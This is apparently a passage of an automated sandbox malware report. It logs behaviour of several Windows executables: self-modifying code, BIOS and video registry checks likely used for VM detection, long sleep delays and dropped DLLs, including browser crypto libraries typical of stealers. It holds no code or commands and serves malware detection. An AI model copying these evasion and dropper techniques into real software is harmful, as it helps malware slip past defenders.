                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXESpecial instruction interceptor: First address: 3B5BD8 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXESpecial instruction interceptor: First address: 1E2D50 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXESpecial instruction interceptor: First address: 41F6A5 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXESpecial instruction interceptor: First address: 388370 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeSpecial instruction interceptor: First address: 3458CB instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeSpecial instruction interceptor: First address: 513D1C instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeSpecial instruction interceptor: First address: 573A45 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeMemory allocated: F30000 memory reserve | memory write watch
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeMemory allocated: 2C80000 memory reserve | memory write watch
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeMemory allocated: 2AC0000 memory reserve | memory write watch
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeCode function: 0_2_052F0000 rdtsc 0_2_052F0000
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeThread delayed: delay time: 180000Jump to behavior
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 547Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1225Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1178Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1241Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1217Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1234Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeWindow / User API: threadDelayed 9583Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow / User API: threadDelayed 1933
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow / User API: threadDelayed 3133
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4797
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3896
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4111
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2530
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2378
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3328
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1328
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3727
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3897
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 577
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4092
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_asyncio.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\win32\_win32sysloader.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin\mfc140u.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\win32\win32api.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_queue.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10235930101\83f34278c7.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\unicodedata.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin\win32ui.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_bz2.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_elementtree.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10028100101\crypted.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10235940101\0629403be8.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10028410101\crypted.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\crypted.41[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\win32\win32trace.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10235950101\d101bd5267.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_brotli.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard\_cffi.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingft.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_lzma.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\simplejson\_speedups.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_multiprocessing.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\dw[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mrwipre12[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\python311.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_decimal.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10019520101\dw.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32\pythoncom311.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32\pywintypes311.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\python3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_overlapped.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\v7942[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10235960101\718edcc992.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\select.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\crypted.7[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10029600101\mrwipre12.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_webp.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\pyexpat.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_socket.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_ssl.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard\backend_c.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeAPI coverage: 4.1 %
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeAPI coverage: 1.9 %
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeAPI coverage: 3.3 %
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0040837017_2_00408370
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7640Thread sleep count: 547 > 30Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7640Thread sleep time: -1094547s >= -30000sJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7628Thread sleep count: 1225 > 30Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7628Thread sleep time: -2451225s >= -30000sJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7600Thread sleep count: 270 > 30Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7600Thread sleep time: -8100000s >= -30000sJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7616Thread sleep count: 1178 > 30Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7616Thread sleep time: -2357178s >= -30000sJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7620Thread sleep count: 1241 > 30Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7620Thread sleep time: -2483241s >= -30000sJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7636Thread sleep count: 1217 > 30Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7636Thread sleep time: -2435217s >= -30000sJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7612Thread sleep count: 1234 > 30Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7612Thread sleep time: -2469234s >= -30000sJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe TID: 3336Thread sleep count: 9583 > 30Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe TID: 3336Thread sleep time: -287490000s >= -30000sJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe TID: 5600Thread sleep time: -180000s >= -30000sJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 776Thread sleep count: 94 > 30
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 776Thread sleep time: -188094s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 4584Thread sleep count: 98 > 30
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 4584Thread sleep time: -196098s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 6120Thread sleep count: 86 > 30
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 6120Thread sleep time: -172086s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 5968Thread sleep time: -210000s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 2124Thread sleep count: 68 > 30
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 2124Thread sleep time: -136068s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 6900Thread sleep count: 1933 > 30
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 7296Thread sleep count: 3133 > 30
